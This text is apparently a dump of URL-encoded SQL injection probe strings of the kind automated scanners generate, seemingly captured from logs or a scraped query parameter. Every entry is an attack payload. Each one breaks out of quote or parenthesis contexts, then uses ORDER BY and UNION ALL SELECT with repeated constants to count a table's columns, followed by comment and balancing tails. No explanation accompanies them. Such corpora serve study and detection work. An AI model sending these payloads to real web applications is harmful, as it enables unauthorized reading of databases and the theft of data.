-1551%29%20UNION%20ALL%20SELECT%203662%2C%203662%2C%203662%2C%203662%2C%203662--%20 -3708%29%20UNION%20ALL%20SELECT%201739%2C%201739%2C%201739%2C%201739%2C%201739%2C%201739--%20 -5154%29%20UNION%20ALL%20SELECT%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689--%20 -6404%29%20UNION%20ALL%20SELECT%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432--%20 -6935%29%20UNION%20ALL%20SELECT%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286--%20 -6157%29%20UNION%20ALL%20SELECT%201319%2C%201319%2C%201319%2C%201319%2C%201319%2C%201319%2C%201319%2C%201319%2C%201319%2C%201319--%20 -1641%27%29%20ORDER%20BY%201--%20 -1349%27%29%20ORDER%20BY%201922--%20 -9080%27%29%20UNION%20ALL%20SELECT%208318--%20 -4270%27%29%20UNION%20ALL%20SELECT%204984%2C%204984--%20 -5852%27%29%20UNION%20ALL%20SELECT%208847%2C%208847%2C%208847--%20 -5345%27%29%20UNION%20ALL%20SELECT%206372%2C%206372%2C%206372%2C%206372--%20 -3287%27%29%20UNION%20ALL%20SELECT%204799%2C%204799%2C%204799%2C%204799%2C%204799--%20 -1890%27%29%20UNION%20ALL%20SELECT%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232--%20 -1244%27%29%20UNION%20ALL%20SELECT%202158%2C%202158%2C%202158%2C%202158%2C%202158%2C%202158%2C%202158--%20 -5944%27%29%20UNION%20ALL%20SELECT%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044--%20 -9829%27%29%20UNION%20ALL%20SELECT%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537--%20 -7484%27%29%20UNION%20ALL%20SELECT%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196--%20 -9307%27%20ORDER%20BY%201--%20 -6244%27%20ORDER%20BY%206844--%20 -4284%27%20UNION%20ALL%20SELECT%203208--%20 -1089%27%20UNION%20ALL%20SELECT%201433%2C%201433--%20 -4614%27%20UNION%20ALL%20SELECT%204668%2C%204668%2C%204668--%20 -9291%27%20UNION%20ALL%20SELECT%208271%2C%208271%2C%208271%2C%208271--%20 -3229%27%20UNION%20ALL%20SELECT%204082%2C%204082%2C%204082%2C%204082%2C%204082--%20 -9219%27%20UNION%20ALL%20SELECT%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552--%20 -8033%27%20UNION%20ALL%20SELECT%206885%2C%206885%2C%206885%2C%206885%2C%206885%2C%206885%2C%206885--%20 -8593%27%20UNION%20ALL%20SELECT%202387%2C%202387%2C%202387%2C%202387%2C%202387%2C%202387%2C%202387%2C%202387--%20 -2713%27%20UNION%20ALL%20SELECT%202383%2C%202383%2C%202383%2C%202383%2C%202383%2C%202383%2C%202383%2C%202383%2C%202383--%20 -5529%27%20UNION%20ALL%20SELECT%204238%2C%204238%2C%204238%2C%204238%2C%204238%2C%204238%2C%204238%2C%204238%2C%204238%2C%204238--%20 -5187%22%20ORDER%20BY%201--%20 -6435%22%20ORDER%20BY%202259--%20 -6844%22%20UNION%20ALL%20SELECT%201247--%20 -9485%22%20UNION%20ALL%20SELECT%201389%2C%201389--%20 -5633%22%20UNION%20ALL%20SELECT%205443%2C%205443%2C%205443--%20 -6851%22%20UNION%20ALL%20SELECT%205388%2C%205388%2C%205388%2C%205388--%20 -1173%22%20UNION%20ALL%20SELECT%206700%2C%206700%2C%206700%2C%206700%2C%206700--%20 -7052%22%20UNION%20ALL%20SELECT%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182--%20 -3965%22%20UNION%20ALL%20SELECT%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146--%20 -9982%22%20UNION%20ALL%20SELECT%206875%2C%206875%2C%206875%2C%206875%2C%206875%2C%206875%2C%206875%2C%206875--%20 -5229%22%20UNION%20ALL%20SELECT%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082--%20 -7311%22%20UNION%20ALL%20SELECT%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885%2C%203885--%20 -6494%29%20ORDER%20BY%201--%20%20AND%20%288514%3D8514 -8962%29%20ORDER%20BY%209483--%20%20AND%20%283410%3D3410 -4282%29%20UNION%20ALL%20SELECT%201743--%20%20AND%20%288484%3D8484 -9005%29%20UNION%20ALL%20SELECT%201704%2C%201704--%20%20AND%20%285164%3D5164 -6280%29%20UNION%20ALL%20SELECT%203072%2C%203072%2C%203072--%20%20AND%20%289667%3D9667 -6918%29%20UNION%20ALL%20SELECT%201692%2C%201692%2C%201692%2C%201692--%20%20AND%20%286996%3D6996 -5106%29%20UNION%20ALL%20SELECT%204242%2C%204242%2C%204242%2C%204242%2C%204242--%20%20AND%20%282662%3D2662 -4986%29%20UNION%20ALL%20SELECT%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584--%20%20AND%20%288592%3D8592 -5455%29%20UNION%20ALL%20SELECT%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128--%20%20AND%20%286751%3D6751 -4622%29%20UNION%20ALL%20SELECT%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814--%20%20AND%20%288678%3D8678 -5912%29%20UNION%20ALL%20SELECT%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691--%20%20AND%20%288630%3D8630 -8572%29%20UNION%20ALL%20SELECT%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334--%20%20AND%20%281066%3D1066 -9283%29%29%20ORDER%20BY%201--%20%20AND%20%28%288546%3D8546 -8092%29%29%20ORDER%20BY%201002--%20%20AND%20%28%289088%3D9088 -5548%29%29%20UNION%20ALL%20SELECT%204812--%20%20AND%20%28%289120%3D9120 -8093%29%29%20UNION%20ALL%20SELECT%201769%2C%201769--%20%20AND%20%28%289007%3D9007 -1260%29%29%20UNION%20ALL%20SELECT%206507%2C%206507%2C%206507--%20%20AND%20%28%288768%3D8768 -1270%29%29%20UNION%20ALL%20SELECT%209790%2C%209790%2C%209790%2C%209790--%20%20AND%20%28%286439%3D6439 -5211%29%29%20UNION%20ALL%20SELECT%205458%2C%205458%2C%205458%2C%205458%2C%205458--%20%20AND%20%28%287068%3D7068 -3772%29%29%20UNION%20ALL%20SELECT%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521--%20%20AND%20%28%287790%3D7790 -7395%29%29%20UNION%20ALL%20SELECT%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435--%20%20AND%20%28%288456%3D8456 -8541%29%29%20UNION%20ALL%20SELECT%202643%2C%202643%2C%202643%2C%202643%2C%202643%2C%202643%2C%202643%2C%202643--%20%20AND%20%28%289428%3D9428 -2540%29%29%20UNION%20ALL%20SELECT%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460--%20%20AND%20%28%286311%3D6311 -9484%29%29%20UNION%20ALL%20SELECT%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981--%20%20AND%20%28%281517%3D1517 -8063%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%286512%3D6512 -5016%29%29%29%20ORDER%20BY%205029--%20%20AND%20%28%28%283162%3D3162 -2280%29%29%29%20UNION%20ALL%20SELECT%207473--%20%20AND%20%28%28%282061%3D2061 -2822%29%29%29%20UNION%20ALL%20SELECT%203497%2C%203497--%20%20AND%20%28%28%284245%3D4245 -4971%29%29%29%20UNION%20ALL%20SELECT%204911%2C%204911%2C%204911--%20%20AND%20%28%28%281600%3D1600 -5414%29%29%29%20UNION%20ALL%20SELECT%203602%2C%203602%2C%203602%2C%203602--%20%20AND%20%28%28%289725%3D9725 -9528%29%29%29%20UNION%20ALL%20SELECT%202086%2C%202086%2C%202086%2C%202086%2C%202086--%20%20AND%20%28%28%288186%3D8186 -2452%29%29%29%20UNION%20ALL%20SELECT%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755--%20%20AND%20%28%28%281652%3D1652 -7763%29%29%29%20UNION%20ALL%20SELECT%205745%2C%205745%2C%205745%2C%205745%2C%205745%2C%205745%2C%205745--%20%20AND%20%28%28%289950%3D9950 -4836%29%29%29%20UNION%20ALL%20SELECT%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108--%20%20AND%20%28%28%285014%3D5014 -2790%29%29%29%20UNION%20ALL%20SELECT%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705--%20%20AND%20%28%28%281639%3D1639 -5767%29%29%29%20UNION%20ALL%20SELECT%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729--%20%20AND%20%28%28%288213%3D8213 -1060%20ORDER%20BY%201--%20 -7903%20ORDER%20BY%205622--%20 -6598%20UNION%20ALL%20SELECT%202862--%20 -5417%20UNION%20ALL%20SELECT%206362%2C%206362--%20 -5448%20UNION%20ALL%20SELECT%201532%2C%201532%2C%201532--%20 -6945%20UNION%20ALL%20SELECT%208907%2C%208907%2C%208907%2C%208907--%20 -3866%20UNION%20ALL%20SELECT%206957%2C%206957%2C%206957%2C%206957%2C%206957--%20 -1330%20UNION%20ALL%20SELECT%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184--%20 -7903%20UNION%20ALL%20SELECT%207692%2C%207692%2C%207692%2C%207692%2C%207692%2C%207692%2C%207692--%20 -4612%20UNION%20ALL%20SELECT%202024%2C%202024%2C%202024%2C%202024%2C%202024%2C%202024%2C%202024%2C%202024--%20 -2303%20UNION%20ALL%20SELECT%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962--%20 -1886%20UNION%20ALL%20SELECT%204755%2C%204755%2C%204755%2C%204755%2C%204755%2C%204755%2C%204755%2C%204755%2C%204755%2C%204755--%20 -2120%27%29%20ORDER%20BY%201--%20%20AND%20%28%27naSm%27%3D%27naSm -1125%27%29%20ORDER%20BY%206849--%20%20AND%20%28%27aPTb%27%3D%27aPTb -1453%27%29%20UNION%20ALL%20SELECT%201700--%20%20AND%20%28%27jzBK%27%3D%27jzBK -5828%27%29%20UNION%20ALL%20SELECT%202101%2C%202101--%20%20AND%20%28%27MTOq%27%3D%27MTOq -6982%27%29%20UNION%20ALL%20SELECT%202185%2C%202185%2C%202185--%20%20AND%20%28%27kRXu%27%3D%27kRXu -8940%27%29%20UNION%20ALL%20SELECT%208596%2C%208596%2C%208596%2C%208596--%20%20AND%20%28%27LDas%27%3D%27LDas -3789%27%29%20UNION%20ALL%20SELECT%209285%2C%209285%2C%209285%2C%209285%2C%209285--%20%20AND%20%28%27xQen%27%3D%27xQen -5150%27%29%20UNION%20ALL%20SELECT%204967%2C%204967%2C%204967%2C%204967%2C%204967%2C%204967--%20%20AND%20%28%27mhby%27%3D%27mhby -1674%27%29%20UNION%20ALL%20SELECT%207616%2C%207616%2C%207616%2C%207616%2C%207616%2C%207616%2C%207616--%20%20AND%20%28%27RvMW%27%3D%27RvMW -4715%27%29%20UNION%20ALL%20SELECT%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294%2C%206294--%20%20AND%20%28%27bqKf%27%3D%27bqKf -1265%27%29%20UNION%20ALL%20SELECT%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347--%20%20AND%20%28%27DWpV%27%3D%27DWpV -2435%27%29%20UNION%20ALL%20SELECT%207852%2C%207852%2C%207852%2C%207852%2C%207852%2C%207852%2C%207852%2C%207852%2C%207852%2C%207852--%20%20AND%20%28%27yzsi%27%3D%27yzsi -9283%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27MuWn%27%3D%27MuWn -7510%27%29%29%20ORDER%20BY%207123--%20%20AND%20%28%28%27VsLv%27%3D%27VsLv -1535%27%29%29%20UNION%20ALL%20SELECT%201751--%20%20AND%20%28%28%27UtmK%27%3D%27UtmK -2725%27%29%29%20UNION%20ALL%20SELECT%207937%2C%207937--%20%20AND%20%28%28%27XguX%27%3D%27XguX -9740%27%29%29%20UNION%20ALL%20SELECT%209585%2C%209585%2C%209585--%20%20AND%20%28%28%27SSeA%27%3D%27SSeA -9452%27%29%29%20UNION%20ALL%20SELECT%204743%2C%204743%2C%204743%2C%204743--%20%20AND%20%28%28%27scGn%27%3D%27scGn -6821%27%29%29%20UNION%20ALL%20SELECT%203385%2C%203385%2C%203385%2C%203385%2C%203385--%20%20AND%20%28%28%27Marz%27%3D%27Marz -8578%27%29%29%20UNION%20ALL%20SELECT%201678%2C%201678%2C%201678%2C%201678%2C%201678%2C%201678--%20%20AND%20%28%28%27aLWV%27%3D%27aLWV -6848%27%29%29%20UNION%20ALL%20SELECT%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206--%20%20AND%20%28%28%27KHNy%27%3D%27KHNy -4438%27%29%29%20UNION%20ALL%20SELECT%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993--%20%20AND%20%28%28%27hvro%27%3D%27hvro -1629%27%29%29%20UNION%20ALL%20SELECT%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575--%20%20AND%20%28%28%27pTxV%27%3D%27pTxV -9844%27%29%29%20UNION%20ALL%20SELECT%201593%2C%201593%2C%201593%2C%201593%2C%201593%2C%201593%2C%201593%2C%201593%2C%201593%2C%201593--%20%20AND%20%28%28%27YUES%27%3D%27YUES -3082%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27LKbs%27%3D%27LKbs -9190%27%29%29%29%20ORDER%20BY%205206--%20%20AND%20%28%28%28%27XlMl%27%3D%27XlMl -8454%27%29%29%29%20UNION%20ALL%20SELECT%204953--%20%20AND%20%28%28%28%27vxxv%27%3D%27vxxv -9884%27%29%29%29%20UNION%20ALL%20SELECT%205216%2C%205216--%20%20AND%20%28%28%28%27Ponk%27%3D%27Ponk -5139%27%29%29%29%20UNION%20ALL%20SELECT%204551%2C%204551%2C%204551--%20%20AND%20%28%28%28%27ZEhF%27%3D%27ZEhF -6043%27%29%29%29%20UNION%20ALL%20SELECT%205109%2C%205109%2C%205109%2C%205109--%20%20AND%20%28%28%28%27Gdur%27%3D%27Gdur -8950%27%29%29%29%20UNION%20ALL%20SELECT%205717%2C%205717%2C%205717%2C%205717%2C%205717--%20%20AND%20%28%28%28%27ZxSP%27%3D%27ZxSP -8485%27%29%29%29%20UNION%20ALL%20SELECT%204881%2C%204881%2C%204881%2C%204881%2C%204881%2C%204881--%20%20AND%20%28%28%28%27ksTh%27%3D%27ksTh -7286%27%29%29%29%20UNION%20ALL%20SELECT%205335%2C%205335%2C%205335%2C%205335%2C%205335%2C%205335%2C%205335--%20%20AND%20%28%28%28%27waOA%27%3D%27waOA -9859%27%29%29%29%20UNION%20ALL%20SELECT%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659--%20%20AND%20%28%28%28%27VYhu%27%3D%27VYhu -5394%27%29%29%29%20UNION%20ALL%20SELECT%202374%2C%202374%2C%202374%2C%202374%2C%202374%2C%202374%2C%202374%2C%202374%2C%202374--%20%20AND%20%28%28%28%27KGJn%27%3D%27KGJn -4381%27%29%29%29%20UNION%20ALL%20SELECT%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990--%20%20AND%20%28%28%28%27dsQw%27%3D%27dsQw -1546%27%20ORDER%20BY%201--%20%20AND%20%27pkZF%27%3D%27pkZF -8411%27%20ORDER%20BY%201404--%20%20AND%20%27Dykt%27%3D%27Dykt -2217%27%20UNION%20ALL%20SELECT%208877--%20%20AND%20%27gKHw%27%3D%27gKHw -9604%27%20UNION%20ALL%20SELECT%204552%2C%204552--%20%20AND%20%27cdzy%27%3D%27cdzy -7413%27%20UNION%20ALL%20SELECT%201923%2C%201923%2C%201923--%20%20AND%20%27hkuN%27%3D%27hkuN -3471%27%20UNION%20ALL%20SELECT%205539%2C%205539%2C%205539%2C%205539--%20%20AND%20%27BxUy%27%3D%27BxUy -8398%27%20UNION%20ALL%20SELECT%202525%2C%202525%2C%202525%2C%202525%2C%202525--%20%20AND%20%27fMcA%27%3D%27fMcA -6870%27%20UNION%20ALL%20SELECT%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743--%20%20AND%20%27pDNw%27%3D%27pDNw -1690%27%20UNION%20ALL%20SELECT%208915%2C%208915%2C%208915%2C%208915%2C%208915%2C%208915%2C%208915--%20%20AND%20%27TxxO%27%3D%27TxxO -2196%27%20UNION%20ALL%20SELECT%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701--%20%20AND%20%27JizK%27%3D%27JizK -4763%27%20UNION%20ALL%20SELECT%207682%2C%207682%2C%207682%2C%207682%2C%207682%2C%207682%2C%207682%2C%207682%2C%207682--%20%20AND%20%27Bodx%27%3D%27Bodx -9032%27%20UNION%20ALL%20SELECT%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426--%20%20AND%20%27bbJd%27%3D%27bbJd -9890%27%29%20ORDER%20BY%201--%20%20AND%20%28%27aVcF%27%20LIKE%20%27aVcF -4483%27%29%20ORDER%20BY%202122--%20%20AND%20%28%27XThk%27%20LIKE%20%27XThk -7827%27%29%20UNION%20ALL%20SELECT%202832--%20%20AND%20%28%27BwVu%27%20LIKE%20%27BwVu -5137%27%29%20UNION%20ALL%20SELECT%208338%2C%208338--%20%20AND%20%28%27uUho%27%20LIKE%20%27uUho -3531%27%29%20UNION%20ALL%20SELECT%207225%2C%207225%2C%207225--%20%20AND%20%28%27XACB%27%20LIKE%20%27XACB -3543%27%29%20UNION%20ALL%20SELECT%209261%2C%209261%2C%209261%2C%209261--%20%20AND%20%28%27ArLr%27%20LIKE%20%27ArLr -4726%27%29%20UNION%20ALL%20SELECT%203869%2C%203869%2C%203869%2C%203869%2C%203869--%20%20AND%20%28%27hPUH%27%20LIKE%20%27hPUH -4721%27%29%20UNION%20ALL%20SELECT%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233--%20%20AND%20%28%27dqdq%27%20LIKE%20%27dqdq -1345%27%29%20UNION%20ALL%20SELECT%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648--%20%20AND%20%28%27fuzr%27%20LIKE%20%27fuzr -5684%27%29%20UNION%20ALL%20SELECT%204452%2C%204452%2C%204452%2C%204452%2C%204452%2C%204452%2C%204452%2C%204452--%20%20AND%20%28%27yWwZ%27%20LIKE%20%27yWwZ -6388%27%29%20UNION%20ALL%20SELECT%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484--%20%20AND%20%28%27vPih%27%20LIKE%20%27vPih -1302%27%29%20UNION%20ALL%20SELECT%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315--%20%20AND%20%28%27MOrb%27%20LIKE%20%27MOrb -5918%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27PHjI%27%20LIKE%20%27PHjI -6951%27%29%29%20ORDER%20BY%202650--%20%20AND%20%28%28%27VtmI%27%20LIKE%20%27VtmI -2207%27%29%29%20UNION%20ALL%20SELECT%207916--%20%20AND%20%28%28%27rMPJ%27%20LIKE%20%27rMPJ -8043%27%29%29%20UNION%20ALL%20SELECT%207529%2C%207529--%20%20AND%20%28%28%27sKHc%27%20LIKE%20%27sKHc -3432%27%29%29%20UNION%20ALL%20SELECT%203311%2C%203311%2C%203311--%20%20AND%20%28%28%27aGvw%27%20LIKE%20%27aGvw -6411%27%29%29%20UNION%20ALL%20SELECT%206882%2C%206882%2C%206882%2C%206882--%20%20AND%20%28%28%27GpOF%27%20LIKE%20%27GpOF -4306%27%29%29%20UNION%20ALL%20SELECT%204216%2C%204216%2C%204216%2C%204216%2C%204216--%20%20AND%20%28%28%27gCxH%27%20LIKE%20%27gCxH -2868%27%29%29%20UNION%20ALL%20SELECT%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563--%20%20AND%20%28%28%27hNTe%27%20LIKE%20%27hNTe -5352%27%29%29%20UNION%20ALL%20SELECT%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590--%20%20AND%20%28%28%27WLIH%27%20LIKE%20%27WLIH -7286%27%29%29%20UNION%20ALL%20SELECT%204100%2C%204100%2C%204100%2C%204100%2C%204100%2C%204100%2C%204100%2C%204100--%20%20AND%20%28%28%27RqkR%27%20LIKE%20%27RqkR -2701%27%29%29%20UNION%20ALL%20SELECT%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787--%20%20AND%20%28%28%27UNTw%27%20LIKE%20%27UNTw -8206%27%29%29%20UNION%20ALL%20SELECT%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785--%20%20AND%20%28%28%27gJYa%27%20LIKE%20%27gJYa -2091%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27Sprw%27%20LIKE%20%27Sprw -4362%27%29%29%29%20ORDER%20BY%204178--%20%20AND%20%28%28%28%27HNKS%27%20LIKE%20%27HNKS -2826%27%29%29%29%20UNION%20ALL%20SELECT%206336--%20%20AND%20%28%28%28%27oEQd%27%20LIKE%20%27oEQd -7098%27%29%29%29%20UNION%20ALL%20SELECT%201321%2C%201321--%20%20AND%20%28%28%28%27qYPF%27%20LIKE%20%27qYPF -3920%27%29%29%29%20UNION%20ALL%20SELECT%209465%2C%209465%2C%209465--%20%20AND%20%28%28%28%27OZKB%27%20LIKE%20%27OZKB -1730%27%29%29%29%20UNION%20ALL%20SELECT%203214%2C%203214%2C%203214%2C%203214--%20%20AND%20%28%28%28%27ehmG%27%20LIKE%20%27ehmG -7393%27%29%29%29%20UNION%20ALL%20SELECT%203272%2C%203272%2C%203272%2C%203272%2C%203272--%20%20AND%20%28%28%28%27tOOe%27%20LIKE%20%27tOOe -1140%27%29%29%29%20UNION%20ALL%20SELECT%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529--%20%20AND%20%28%28%28%27RGLv%27%20LIKE%20%27RGLv -6011%27%29%29%29%20UNION%20ALL%20SELECT%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909--%20%20AND%20%28%28%28%27uwNb%27%20LIKE%20%27uwNb -8571%27%29%29%29%20UNION%20ALL%20SELECT%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541--%20%20AND%20%28%28%28%27qxxI%27%20LIKE%20%27qxxI -5253%27%29%29%29%20UNION%20ALL%20SELECT%206251%2C%206251%2C%206251%2C%206251%2C%206251%2C%206251%2C%206251%2C%206251%2C%206251--%20%20AND%20%28%28%28%27MyYg%27%20LIKE%20%27MyYg -4410%27%29%29%29%20UNION%20ALL%20SELECT%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533--%20%20AND%20%28%28%28%27NQIk%27%20LIKE%20%27NQIk -5378%27%20ORDER%20BY%201--%20%20AND%20%27Roim%27%20LIKE%20%27Roim -2931%27%20ORDER%20BY%207598--%20%20AND%20%27VCoQ%27%20LIKE%20%27VCoQ -1556%27%20UNION%20ALL%20SELECT%206648--%20%20AND%20%27tGka%27%20LIKE%20%27tGka -9913%27%20UNION%20ALL%20SELECT%204670%2C%204670--%20%20AND%20%27LwyH%27%20LIKE%20%27LwyH -1159%27%20UNION%20ALL%20SELECT%206253%2C%206253%2C%206253--%20%20AND%20%27tRSh%27%20LIKE%20%27tRSh -1653%27%20UNION%20ALL%20SELECT%207416%2C%207416%2C%207416%2C%207416--%20%20AND%20%27gtzm%27%20LIKE%20%27gtzm -4816%27%20UNION%20ALL%20SELECT%203812%2C%203812%2C%203812%2C%203812%2C%203812--%20%20AND%20%27wIKa%27%20LIKE%20%27wIKa -6895%27%20UNION%20ALL%20SELECT%209824%2C%209824%2C%209824%2C%209824%2C%209824%2C%209824--%20%20AND%20%27Iskk%27%20LIKE%20%27Iskk -7653%27%20UNION%20ALL%20SELECT%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088--%20%20AND%20%27RAmn%27%20LIKE%20%27RAmn -2213%27%20UNION%20ALL%20SELECT%202894%2C%202894%2C%202894%2C%202894%2C%202894%2C%202894%2C%202894%2C%202894--%20%20AND%20%27UGJX%27%20LIKE%20%27UGJX -1076%27%20UNION%20ALL%20SELECT%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344--%20%20AND%20%27Sgza%27%20LIKE%20%27Sgza -6947%27%20UNION%20ALL%20SELECT%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836--%20%20AND%20%27BDCP%27%20LIKE%20%27BDCP -7987%22%29%20ORDER%20BY%201--%20%20AND%20%28%22EKWL%22%3D%22EKWL -1976%22%29%20ORDER%20BY%207336--%20%20AND%20%28%22HNxT%22%3D%22HNxT -8913%22%29%20UNION%20ALL%20SELECT%201694--%20%20AND%20%28%22YLGC%22%3D%22YLGC -7285%22%29%20UNION%20ALL%20SELECT%203876%2C%203876--%20%20AND%20%28%22oqup%22%3D%22oqup -9916%22%29%20UNION%20ALL%20SELECT%201969%2C%201969%2C%201969--%20%20AND%20%28%22zmbK%22%3D%22zmbK -1058%22%29%20UNION%20ALL%20SELECT%207653%2C%207653%2C%207653%2C%207653--%20%20AND%20%28%22RdkA%22%3D%22RdkA -6971%22%29%20UNION%20ALL%20SELECT%201058%2C%201058%2C%201058%2C%201058%2C%201058--%20%20AND%20%28%22LpXp%22%3D%22LpXp -7774%22%29%20UNION%20ALL%20SELECT%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970--%20%20AND%20%28%22oWug%22%3D%22oWug -6384%22%29%20UNION%20ALL%20SELECT%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340--%20%20AND%20%28%22jFof%22%3D%22jFof -2644%22%29%20UNION%20ALL%20SELECT%202075%2C%202075%2C%202075%2C%202075%2C%202075%2C%202075%2C%202075%2C%202075--%20%20AND%20%28%22OyHa%22%3D%22OyHa -7610%22%29%20UNION%20ALL%20SELECT%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599--%20%20AND%20%28%22nPwl%22%3D%22nPwl -2136%22%29%20UNION%20ALL%20SELECT%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455--%20%20AND%20%28%22Ftmr%22%3D%22Ftmr -9101%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22hKFa%22%3D%22hKFa -1685%22%29%29%20ORDER%20BY%205145--%20%20AND%20%28%28%22ynyD%22%3D%22ynyD -2836%22%29%29%20UNION%20ALL%20SELECT%205030--%20%20AND%20%28%28%22ZVts%22%3D%22ZVts -2814%22%29%29%20UNION%20ALL%20SELECT%207725%2C%207725--%20%20AND%20%28%28%22nRFC%22%3D%22nRFC -7739%22%29%29%20UNION%20ALL%20SELECT%208299%2C%208299%2C%208299--%20%20AND%20%28%28%22fqXz%22%3D%22fqXz -4565%22%29%29%20UNION%20ALL%20SELECT%203372%2C%203372%2C%203372%2C%203372--%20%20AND%20%28%28%22PEBD%22%3D%22PEBD -6038%22%29%29%20UNION%20ALL%20SELECT%202565%2C%202565%2C%202565%2C%202565%2C%202565--%20%20AND%20%28%28%22rYnX%22%3D%22rYnX -3679%22%29%29%20UNION%20ALL%20SELECT%201788%2C%201788%2C%201788%2C%201788%2C%201788%2C%201788--%20%20AND%20%28%28%22VfYy%22%3D%22VfYy -3833%22%29%29%20UNION%20ALL%20SELECT%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358--%20%20AND%20%28%28%22Qwqt%22%3D%22Qwqt -8949%22%29%29%20UNION%20ALL%20SELECT%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861--%20%20AND%20%28%28%22NzMB%22%3D%22NzMB -7426%22%29%29%20UNION%20ALL%20SELECT%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394--%20%20AND%20%28%28%22BkiE%22%3D%22BkiE -9760%22%29%29%20UNION%20ALL%20SELECT%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684--%20%20AND%20%28%28%22SOBc%22%3D%22SOBc -1770%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22lHgi%22%3D%22lHgi -4852%22%29%29%29%20ORDER%20BY%201788--%20%20AND%20%28%28%28%22judP%22%3D%22judP -8328%22%29%29%29%20UNION%20ALL%20SELECT%202792--%20%20AND%20%28%28%28%22HQEi%22%3D%22HQEi -1386%22%29%29%29%20UNION%20ALL%20SELECT%208537%2C%208537--%20%20AND%20%28%28%28%22DJPu%22%3D%22DJPu 